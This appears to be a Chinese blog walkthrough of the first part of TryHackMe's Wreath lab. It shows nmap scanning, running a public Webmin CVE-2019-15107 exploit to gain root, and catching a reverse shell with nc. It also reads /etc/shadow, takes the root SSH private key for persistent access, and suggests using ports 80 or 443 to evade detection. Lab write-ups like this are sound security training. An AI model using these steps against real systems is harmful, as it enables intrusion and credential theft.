前言:这是tryhackme的一大变化,出了一个系统的攻防的模拟环境,模拟前期打点,获取权限后,内网横向移动,以及最终打到个人PC等。这个系列文章正在更新。。
1.初步信息收集+打点
给了一个工具包,推荐还是用最新的,密码是WreathNetwork
PS‼️
上传工具的话,别上传原始名字,改一下,比如工具名-你的昵称。因为大家是共用的这个环境。
Linux:Ctrl+T 可以把任务隐藏在后台,当前终端继续使用
故事背景:
多年不联系的老朋友Thomas Wreath突然给你打电话,问道,我听说你成为了黑客?很酷,我有一些服务器,你能获取他们的权限吗?
扫描,探测
老朋友给了我们一个ip 10.200.188.200
用nmap扫描一下,同时,最好保存扫描结果,这样不需要再次扫描
先扫描1-15000 并保存结果
-p1-15000
-oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式
nmap -p-15000 -vv TARGET_IP -oG initial-scan
开放端口如下:22、80、443、10000
获取操作系统
有的时候nmap扫描不出来,可以先和系统进行交互进行判断
从开发者工具中看服务器响应头能够看到,是centos
去访问这个网站,能够重定向到一个域名,但是访问失败,可能是它没设置dns
我们可以手动设置dns
Linux: /etc/hosts
windows:C:\Windows\System32\drivers\etc\hosts
(需要管理员权限
下面就是仔细阅读页面上的内容,记录下来!
移动电话号码:
nmap -sV 获取版本信息
这个版本的服务有CVE漏洞,可以google搜一下
上面已经搜集到了漏洞,下面需要收集EXP
克隆exp
git clone https://github.com/MuirlandOracle/CVE-2019-15107
安装依赖
cd CVE-2019-15107 && pip3 install -r requirements.txt
添加执行权限
chmod +x ./CVE-2019-15107.py
不要轻易运行网上下的脚本,可执行程序等,可以先读一下
./CVE-2019-15107.py TARGET_IP
开始攻击!
whoami
root (不需要提权了
这个shell还不太行,可以手动再获取一个反弹shell,或者在这里输入shell就可以了
用nc获取反弹shell
nc -lvnp 9999
可以做一个tryhackme的shell房间,看看如何让shell更稳定以及它的类型
反弹shell的时候可以选443 80等,正常的应用端口逃避检测
进一步的攻击吧!
先看一下root用户的hash
在/etc/shadow里面
这个hash破解不了,但是可以通过其他途径一直控制服务器
ssh密钥!
/root/.ssh/id_rsa
下载下来,然后修改权限 chmod 600 KEY_NAME
用私钥链接
ssh root@ip -i 私钥文件